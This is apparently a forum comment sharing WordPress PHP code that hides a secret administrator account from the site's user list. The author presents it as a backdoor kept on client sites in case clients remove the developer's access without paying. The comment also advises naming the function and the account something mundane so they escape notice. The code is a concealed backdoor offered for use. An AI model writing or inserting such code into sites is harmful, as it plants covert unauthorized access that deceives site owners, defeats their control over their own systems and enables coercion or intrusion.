While you can’t guarantee the absolute safety of this user, I have used this to hide my backdoor user (useful for clients who are aggressive in removing users, yet may forget to pay their bill, for example)
add_action('pre_user_query','sleeper_pre_user_query');
function sleeper_pre_user_query($user_search) {
global $current_user;
$username = $current_user->user_login;
if ($username != 'my_secret_admin_user') {
global $wpdb;
$user_search->query_where =
str_replace(
'WHERE 1=1',
"WHERE 1=1 AND {$wpdb->users}.user_login !=
'my_secret_admin_user'",$user_search->query_where
);
}
}
I’d name the function something mundane sounding, might want your user to be mundane as well. The code prevents any other user from seeing that user in the admin list.